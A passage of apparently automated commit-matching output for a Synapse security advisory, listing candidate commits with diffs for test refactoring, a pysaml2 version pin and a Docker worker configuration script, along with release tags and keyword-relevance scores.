channel = make_request(self.reactor, FakeSite(res), b\"GET\", b\"/_matrix/foobar\")", - "@@ -174,3 +172,3 @@ class JsonResourceTests(unittest.TestCase):", - " # The path was registered as GET, but this is a HEAD request.", - "- _, channel = make_request(self.reactor, FakeSite(res), b\"HEAD\", b\"/_matrix/foo\")", - "+ channel = make_request(self.reactor, FakeSite(res), b\"HEAD\", b\"/_matrix/foo\")", - "@@ -206,3 +204,3 @@ class OptionsResourceTests(unittest.TestCase):", - " # render the request and return the channel", - "- _, channel = make_request(self.reactor, site, method, path, shorthand=False)", - "+ channel = make_request(self.reactor, site, method, path, shorthand=False)", - " return channel", - "@@ -279,3 +277,3 @@ class WrapHtmlRequestHandlerTests(unittest.TestCase):", - "- _, channel = make_request(self.reactor, FakeSite(res), b\"GET\", b\"/path\")", - "+ channel = make_request(self.reactor, FakeSite(res), b\"GET\", b\"/path\")", - "@@ -297,3 +295,3 @@ class WrapHtmlRequestHandlerTests(unittest.TestCase):", - "- _, channel = make_request(self.reactor, FakeSite(res), b\"GET\", b\"/path\")", - "+ channel = make_request(self.reactor, FakeSite(res), b\"GET\", b\"/path\")", - "@@ -318,3 +316,3 @@ class WrapHtmlRequestHandlerTests(unittest.TestCase):", - "- _, channel = make_request(self.reactor, FakeSite(res), b\"GET\", b\"/path\")", - "+ channel = make_request(self.reactor, FakeSite(res), b\"GET\", b\"/path\")", - "@@ -337,3 +335,3 @@ class WrapHtmlRequestHandlerTests(unittest.TestCase):", - "- _, channel = make_request(self.reactor, FakeSite(res), b\"HEAD\", b\"/path\")", - "+ channel = make_request(self.reactor, FakeSite(res), b\"HEAD\", b\"/path\")", - "diff --git a/tests/test_terms_auth.py b/tests/test_terms_auth.py", - "index 71580b454..a743cdc3a 100644", - "--- a/tests/test_terms_auth.py", - "+++ b/tests/test_terms_auth.py", - "@@ -55,3 +55,3 @@ class TermsTestCase(unittest.HomeserverTestCase):", - " request_data = json.dumps({\"username\": \"kermit\", \"password\": \"monkey\"})", - "- request, channel = self.make_request(b\"POST\", self.url, request_data)", - "+ channel = self.make_request(b\"POST\", self.url, request_data)", - "@@ -98,3 +98,3 @@ class TermsTestCase(unittest.HomeserverTestCase):", - "- request, channel = self.make_request(b\"POST\", self.url, request_data)", - "+ channel = self.make_request(b\"POST\", self.url, request_data)", - "@@ -115,3 +115,3 @@ class TermsTestCase(unittest.HomeserverTestCase):", - " )", - "- request, channel = self.make_request(b\"POST\", self.url, request_data)", - "+ channel = self.make_request(b\"POST\", self.url, request_data)", - "diff --git a/tests/unittest.py b/tests/unittest.py", - "index 102b0a1f3..16fd4f32b 100644", - "--- a/tests/unittest.py", - "+++ b/tests/unittest.py", - "@@ -374,34 +374,2 @@ class HomeserverTestCase(TestCase):", - "- # Annoyingly mypy doesn't seem to pick up the fact that T is SynapseRequest", - "- # when the `request` arg isn't given, so we define an explicit override to", - "- # cover that case.", - "- @overload", - "- def make_request(", - "- self,", - "- method: Union[bytes, str],", - "- path: Union[bytes, str],", - "- content: Union[bytes, dict] = b\"\",", - "- access_token: Optional[str] = None,", - "- shorthand: bool = True,", - "- federation_auth_origin: str = None,", - "- content_is_form: bool = False,", - "- await_result: bool = True,", - "- ) -> Tuple[SynapseRequest, FakeChannel]:", - "- ...", - "-", - "- @overload", - "- def make_request(", - "- self,", - "- method: Union[bytes, str],", - "- path: Union[bytes, str],", - "- content: Union[bytes, dict] = b\"\",", - "- access_token: Optional[str] = None,", - "- request: Type[T] = SynapseRequest,", - "- shorthand: bool = True,", - "- federation_auth_origin: str = None,", - "- content_is_form: bool = False,", - "- await_result: bool = True,", - "- ) -> Tuple[T, FakeChannel]:", - "- ...", - "-", - " def make_request(", - "@@ -417,3 +385,3 @@ class HomeserverTestCase(TestCase):", - " await_result: bool = True,", - "- ) -> Tuple[T, FakeChannel]:", - "+ ) -> FakeChannel:", - " \"\"\"", - "@@ -440,3 +408,3 @@ class HomeserverTestCase(TestCase):", - " Returns:", - "- Tuple[synapse.http.site.SynapseRequest, channel]", - "+ The FakeChannel object which stores the result of the request.", - " \"\"\"", - "@@ -570,3 +538,3 @@ class HomeserverTestCase(TestCase):", - " # Create the user", - "- request, channel = self.make_request(\"GET\", \"/_synapse/admin/v1/register\")", - "+ channel = self.make_request(\"GET\", \"/_synapse/admin/v1/register\")", - " self.assertEqual(channel.code, 200, msg=channel.result)", - "@@ -595,3 +563,3 @@ class HomeserverTestCase(TestCase):", - " )", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\", \"/_synapse/admin/v1/register\", body.encode(\"utf8\")", - "@@ -613,3 +581,3 @@ class HomeserverTestCase(TestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\", \"/_matrix/client/r0/login\", json.dumps(body).encode(\"utf8\")", - "@@ -681,3 +649,3 @@ class HomeserverTestCase(TestCase):", - "- request, channel = self.make_request(", - "+ channel = self.make_request(", - " \"POST\", \"/_matrix/client/r0/login\", json.dumps(body).encode(\"utf8\")" - ], - "changed_files": [ - "tests/app/test_frontend_proxy.py", - "tests/app/test_openid_listener.py", - "tests/federation/test_complexity.py", - "tests/federation/test_federation_server.py", - "tests/federation/transport/test_server.py", - "tests/handlers/test_directory.py", - "tests/handlers/test_message.py", - "tests/handlers/test_password_providers.py", - "tests/handlers/test_typing.py", - "tests/handlers/test_user_directory.py", - "tests/http/test_additional_resource.py", - "tests/push/test_http.py", - "tests/replication/test_auth.py", - "tests/replication/test_client_reader_shard.py", - "tests/replication/test_multi_media_repo.py", - "tests/replication/test_sharded_event_persister.py", - "tests/rest/admin/test_admin.py", - "tests/rest/admin/test_device.py", - "tests/rest/admin/test_event_reports.py", - "tests/rest/admin/test_media.py", - "tests/rest/admin/test_room.py", - "tests/rest/admin/test_statistics.py", - "tests/rest/admin/test_user.py", - "tests/rest/client/test_consent.py", - "tests/rest/client/test_ephemeral_message.py", - "tests/rest/client/test_identity.py", - "tests/rest/client/test_redactions.py", - "tests/rest/client/test_retention.py", - "tests/rest/client/test_shadow_banned.py", - "tests/rest/client/test_third_party_rules.py", - "tests/rest/client/v1/test_directory.py", - "tests/rest/client/v1/test_events.py", - "tests/rest/client/v1/test_login.py", - "tests/rest/client/v1/test_presence.py", - "tests/rest/client/v1/test_profile.py", - "tests/rest/client/v1/test_push_rule_attrs.py", - "tests/rest/client/v1/test_rooms.py", - "tests/rest/client/v1/test_typing.py", - "tests/rest/client/v1/utils.py", - "tests/rest/client/v2_alpha/test_account.py", - "tests/rest/client/v2_alpha/test_auth.py", - "tests/rest/client/v2_alpha/test_capabilities.py", - "tests/rest/client/v2_alpha/test_filter.py", - "tests/rest/client/v2_alpha/test_password_policy.py", - "tests/rest/client/v2_alpha/test_register.py", - "tests/rest/client/v2_alpha/test_relations.py", - "tests/rest/client/v2_alpha/test_shared_rooms.py", - "tests/rest/client/v2_alpha/test_sync.py", - "tests/rest/media/v1/test_media_storage.py", - "tests/rest/media/v1/test_url_preview.py", - "tests/rest/test_health.py", - "tests/rest/test_well_known.py", - "tests/server.py", - "tests/server_notices/test_consent.py", - "tests/server_notices/test_resource_limits_server_notices.py", - "tests/test_mau.py", - "tests/test_server.py", - "tests/test_terms_auth.py", - "tests/unittest.py" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: well-known", - "relevance": 8 - }, - { - "id": "ADV_KEYWORDS_IN_MSG", - "message": "The commit message and the advisory description contain the following keywords: request", - "relevance": 4 - }, - { - "id": "ADV_KEYWORDS_IN_FILES", - "message": "An advisory keyword is contained in the changed files: server, federation, know, resource, file", - "relevance": 4 - } - ] - }, - { - "commit_id": "0eb9b2f86667a059f692d71d5c224c173498bb7b", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1607452885, - "hunks": 2, - "message": "Fix installing pysaml2 on Python 3.5. (#8898) This pins pysaml2 to < 6.4.0 on Python 3.5, as the last known working version.", - "diff": [ - "diff --git a/changelog.d/8898.misc b/changelog.d/8898.misc", - "new file mode 100644", - "index 000000000..bdb0d40d5", - "--- /dev/null", - "+++ b/changelog.d/8898.misc", - "@@ -0,0 +1 @@", - "+Add a maximum version for pysaml2 on Python 3.5.", - "diff --git a/synapse/python_dependencies.py b/synapse/python_dependencies.py", - "index aab77fc45..040f76bb5 100644", - "--- a/synapse/python_dependencies.py", - "+++ b/synapse/python_dependencies.py", - "@@ -101,3 +101,7 @@ CONDITIONAL_REQUIREMENTS = {", - " ],", - "- \"saml2\": [\"pysaml2>=4.5.0\"],", - "+ \"saml2\": [", - "+ # pysaml2 6.4.0 is incompatible with Python 3.5 (see https://github.com/IdentityPython/pysaml2/issues/749)", - "+ \"pysaml2>=4.5.0,<6.4.0;python_version<'3.6'\",", - "+ \"pysaml2>=4.5.0;python_version>='3.6'\",", - "+ ],", - " \"oidc\": [\"authlib>=0.14.0\"]," - ], - "changed_files": [ - "changelog.d/8898.misc", - "synapse/python_dependencies.py" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": { - "8898": "" - }, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "1a9553045c239160e4c9d6aff1f9adb7fd7d7193" - ] - ], - "tags": [ - "v1.23.1", - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [ - { - "id": "ADV_KEYWORDS_IN_MSG", - "message": "The commit message and the advisory description contain the following keywords: know, version, python", - "relevance": 4 - }, - { - "id": "ADV_KEYWORDS_IN_FILES", - "message": "An advisory keyword is contained in the changed files: python", - "relevance": 4 - }, - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "GITHUB_ISSUE_IN_MESSAGE", - "message": "The commit message references some github issue: 8898", - "relevance": 2 - } - ] - }, - { - "commit_id": "62ac8b9c0db62ba42934b432b10fa9d87ee68434", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1608059755, - "hunks": 11, - "message": "Get Synapse main and worker process startup working!", - "diff": [ - "diff --git a/docker/Dockerfile-workers b/docker/Dockerfile-workers", - "index 88b2a5262..a98d95d5e 100644", - "--- a/docker/Dockerfile-workers", - "+++ b/docker/Dockerfile-workers", - "@@ -7,11 +7,4 @@ RUN apt-get install -y supervisor redis nginx", - "-# A script to read environment variables and create the necessary", - "-# files to run the desired worker configuration", - "-COPY ./docker/create_worker_config_files.py /create_worker_config_files.py", - "-RUN /create_worker_config_files.py", - "-", - "-# Create a volume for logging. The official Synapse docker image", - "-# only logs to console, however this is inconvenient for multi-process", - "-# containers.", - "-VOLUME [\"/logs\"]", - "+# Copy the worker process and log configuration files", - "+COPY ./docker/workers /conf/workers/", - "@@ -20,6 +13,10 @@ EXPOSE 8008/tcp 8009/tcp 8448/tcp", - "-# Start supervisord", - "-COPY ./docker/worker_conf/supervisord.conf /etc/supervisor/conf.d/supervisord.conf", - "-ENTRYPOINT [\"/usr/bin/supervisord\"]", - "+# Volume for user-editable config files, logs etc.", - "+VOLUME [\"/data\"]", - "+", - "+# A script to read environment variables and create the necessary", - "+# files to run the desired worker configuration. Will start supervisord.", - "+COPY ./docker/configure_workers_and_start.py /configure_workers_and_start.py", - "+ENTRYPOINT [\"/configure_workers_and_start.py\"]", - "-# TODO: Healthcheck? Can we ask supervisord?", - "\\ No newline at end of file", - "+# TODO: Healthcheck? Which worker to ask? Can we ask supervisord?", - "\\ No newline at end of file", - "diff --git a/docker/configure_workers_and_start.py b/docker/configure_workers_and_start.py", - "new file mode 100755", - "index 000000000..57ae5cac8", - "--- /dev/null", - "+++ b/docker/configure_workers_and_start.py", - "@@ -0,0 +1,298 @@", - "+#!/usr/bin/env python", - "+# -*- coding: utf-8 -*-", - "+# Copyright 2020 The Matrix.org Foundation C.I.C.", - "+#", - "+# Licensed under the Apache License, Version 2.0 (the \"License\");", - "+# you may not use this file except in compliance with the License.", - "+# You may obtain a copy of the License at", - "+#", - "+# http://www.apache.org/licenses/LICENSE-2.0", - "+#", - "+# Unless required by applicable law or agreed to in writing, software", - "+# distributed under the License is distributed on an \"AS IS\" BASIS,", - "+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", - "+# See the License for the specific language governing permissions and", - "+# limitations under the License.", - "+", - "+# This script reads environment variables and generates a shared Synapse worker,", - "+# nginx and supervisord configs depending on the workers requested", - "+", - "+import os", - "+import sys", - "+import subprocess", - "+import jinja2", - "+", - "+", - "+# Utility functions", - "+def log(txt):", - "+ print(txt)", - "+", - "+", - "+def error(txt):", - "+ log(txt)", - "+ sys.exit(2)", - "+", - "+", - "+def convert(src, dst, environ):", - "+ \"\"\"Generate a file from a template", - "+", - "+ Args:", - "+ src (str): path to input file", - "+ dst (str): path to file to write", - "+ environ (dict): environment dictionary, for replacement mappings.", - "+ \"\"\"", - "+ with open(src) as infile:", - "+ template = infile.read()", - "+ rendered = jinja2.Template(template, autoescape=True).render(**environ)", - "+ with open(dst, \"w\") as outfile:", - "+ outfile.write(rendered)", - "+", - "+", - "+def generate_base_homeserver_config():", - "+ \"\"\"Starts Synapse and generates a basic homeserver config, which will later be", - "+ modified for worker support.", - "+", - "+ Raises: CalledProcessError if calling start.py return a non-zero exit code.", - "+ \"\"\"", - "+ # start.py already does this for us, so just call that.", - "+ # note that this script is copied in in the official, monolith dockerfile", - "+ subprocess.check_output([\"/usr/local/bin/python\", \"/start.py\", \"generate\"])", - "+", - "+", - "+def generate_worker_files(environ, config_path: str, data_dir: str):", - "+ \"\"\"Read the desired list of workers from environment variables and generate", - "+ shared homeserver, nginx and supervisord configs.", - "+", - "+ Args:", - "+ environ: _Environ[str]", - "+ config_path: Where to output the generated Synapse main worker config file.", - "+ data_dir: The location of the synapse data directory. Where log and", - "+ user-facing config files live.", - "+ \"\"\"", - "+ # Note that yaml cares about indentation, so care should be taken to insert lines", - "+ # into files at the correct indentation below.", - "+", - "+ # The contents of a Synapse config file that will be added alongside the generated", - "+ # config when running the main Synapse process.", - "+ # It is intended mainly for disabling functionality when certain workers are spun up.", - "+ homeserver_config = \"\"\"", - "+redis:", - "+ enabled: true", - "+", - "+# TODO: remove before prod", - "+suppress_key_server_warning: true", - "+ \"\"\"", - "+", - "+ # The supervisord config", - "+ supervisord_config = \"\"\"", - "+[supervisord]", - "+nodaemon=true", - "+", - "+[program:nginx]", - "+command=/usr/sbin/nginx -g \"daemon off;\"", - "+priority=900", - "+stdout_logfile=/dev/stdout", - "+stdout_logfile_maxbytes=0", - "+stderr_logfile=/dev/stderr", - "+stderr_logfile_maxbytes=0", - "+username=www-data", - "+autorestart=true", - "+", - "+[program:synapse_main]", - "+command=/usr/local/bin/python -m synapse.app.homeserver \\", - "+ --config-path=\"%s\" \\", - "+ --config-path=/conf/workers/shared.yaml", - "+", - "+# Log startup failures to supervisord's stdout/err", - "+# Regular synapse logs will still go in the configured data directory", - "+stdout_logfile=/dev/stdout", - "+stdout_logfile_maxbytes=0", - "+stderr_logfile=/dev/stderr", - "+stderr_logfile_maxbytes=0", - "+autorestart=unexpected", - "+exitcodes=0", - "+", - "+ \"\"\" % (config_path,)", - "+", - "+ # An nginx site config. Will live in /etc/nginx/conf.d", - "+ nginx_config_template_header = \"\"\"", - "+server {", - "+ listen 80;", - "+ listen [::]:80;", - "+", - "+ # For the federation port", - "+ listen 8448 default_server;", - "+ listen [::]:8448 default_server;", - "+", - "+ server_name localhost;", - "+ \"\"\"", - "+ nginx_config_body = \"\" # to modify below", - "+ nginx_config_template_end = \"\"\"", - "+ # Send all other traffic to the main process", - "+ location ~* ^(\\/_matrix|\\/_synapse) {", - "+ proxy_pass http://localhost:8008;", - "+ proxy_set_header X-Forwarded-For $remote_addr;", - "+", - "+ # TODO: Can we move this to the default nginx.conf so all locations are", - "+ # affected?", - "+ #", - "+ # Nginx by default only allows file uploads up to 1M in size", - "+ # Increase client_max_body_size to match max_upload_size defined in homeserver.yaml", - "+ client_max_body_size 50M;", - "+ }", - "+}", - "+ \"\"\"", - "+", - "+ # Read desired worker configuration from environment", - "+ if \"SYNAPSE_WORKERS\" not in environ:", - "+ error(\"Environment variable 'SYNAPSE_WORKERS' is mandatory.\")", - "+", - "+ worker_types = environ.get(\"SYNAPSE_WORKERS\")", - "+ worker_types = worker_types.split(\",\")", - "+", - "+ for worker_type in worker_types:", - "+ worker_type = worker_type.strip()", - "+", - "+ if worker_type == \"pusher\":", - "+ # Disable push handling from the main process", - "+ homeserver_config += \"\"\"", - "+start_pushers: false", - "+ \"\"\"", - "+", - "+ # Enable the pusher worker in supervisord", - "+ supervisord_config += \"\"\"", - "+[program:synapse_pusher]", - "+command=/usr/local/bin/python -m synapse.app.pusher \\", - "+ --config-path=\"%s\" \\", - "+ --config-path=/conf/workers/shared.yaml \\", - "+ --config-path=/conf/workers/pusher.yaml", - "+autorestart=unexpected", - "+exitcodes=0", - "+stdout_logfile=/dev/stdout", - "+stdout_logfile_maxbytes=0", - "+stderr_logfile=/dev/stderr", - "+stderr_logfile_maxbytes=0", - "+ \"\"\" % (config_path,)", - "+", - "+ # This worker does not handle any REST endpoints", - "+", - "+ elif worker_type == \"appservice\":", - "+ # Disable appservice traffic sending from the main process", - "+ homeserver_config += \"\"\"", - "+ notify_appservices: false", - "+ \"\"\"", - "+", - "+ # Enable the pusher worker in supervisord", - "+ supervisord_config += \"\"\"", - "+[program:synapse_appservice]", - "+command=/usr/local/bin/python -m synapse.app.appservice \\", - "+ --config-path=\"%s\" \\", - "+ --config-path=/conf/workers/shared.yaml \\", - "+ --config-path=/conf/workers/appservice.yaml", - "+autorestart=unexpected", - "+exitcodes=0", - "+stdout_logfile=/dev/stdout", - "+stdout_logfile_maxbytes=0", - "+stderr_logfile=/dev/stderr", - "+stderr_logfile_maxbytes=0", - "+ \"\"\" % (config_path,)", - "+", - "+ # This worker does not handle any REST endpoints", - "+", - "+ elif worker_type == \"user_dir\":", - "+ # Disable user directory updates on the main process", - "+ homeserver_config += \"\"\"", - "+update_user_directory: false", - "+ \"\"\"", - "+", - "+ # Enable the user directory worker in supervisord", - "+ supervisord_config += \"\"\"", - "+[program:synapse_user_dir]", - "+command=/usr/local/bin/python -m synapse.app.user_dir \\", - "+ --config-path=\"%s\" \\", - "+ --config-path=/conf/workers/shared.yaml \\", - "+ --config-path=/conf/workers/user_dir.yaml", - "+autorestart=unexpected", - "+exitcodes=0", - "+stdout_logfile=/dev/stdout", - "+stdout_logfile_maxbytes=0", - "+stderr_logfile=/dev/stderr", - "+stderr_logfile_maxbytes=0", - "+ \"\"\" % (config_path,)", - "+", - "+ # Route user directory requests to this worker", - "+ nginx_config_body += \"\"\"", - "+ location ~* ^/_matrix/client/(api/v1|r0|unstable)/user_directory/search$ {", - "+ proxy_pass http://localhost:8010;", - "+ proxy_set_header X-Forwarded-For $remote_addr;", - "+ }", - "+ \"\"\"", - "+", - "+ # Write out the config files", - "+", - "+ # Shared homeserver config", - "+ print(homeserver_config)", - "+ with open(\"/conf/workers/shared.yaml\", \"w\") as f:", - "+ f.write(homeserver_config)", - "+", - "+ # Nginx config", - "+ print()", - "+ print(nginx_config_template_header)", - "+ print(nginx_config_body)", - "+ print(nginx_config_template_end)", - "+ with open(\"/etc/nginx/conf.d/matrix-synapse.conf\", \"w\") as f:", - "+ f.write(nginx_config_template_header)", - "+ f.write(nginx_config_body)", - "+ f.write(nginx_config_template_end)", - "+", - "+ # Supervisord config", - "+ print()", - "+ print(supervisord_config)", - "+ with open(\"/etc/supervisor/conf.d/supervisord.conf\", \"w\") as f:", - "+ f.write(supervisord_config)", - "+", - "+ # Generate worker log config files from the templates.", - "+ # The templates are mainly there so that we can inject some environment variable", - "+ # values into them.", - "+ log_config_template_dir = \"/conf/workers/log_config_templates/\"", - "+ log_config_dir = \"/conf/workers/\"", - "+ for log_config_filename in os.listdir(log_config_template_dir):", - "+ template_path = log_config_template_dir + log_config_filename", - "+ out_path = log_config_dir + log_config_filename", - "+", - "+ convert(template_path, out_path, environ)", - "+", - "+ # Ensure the logging directory exists", - 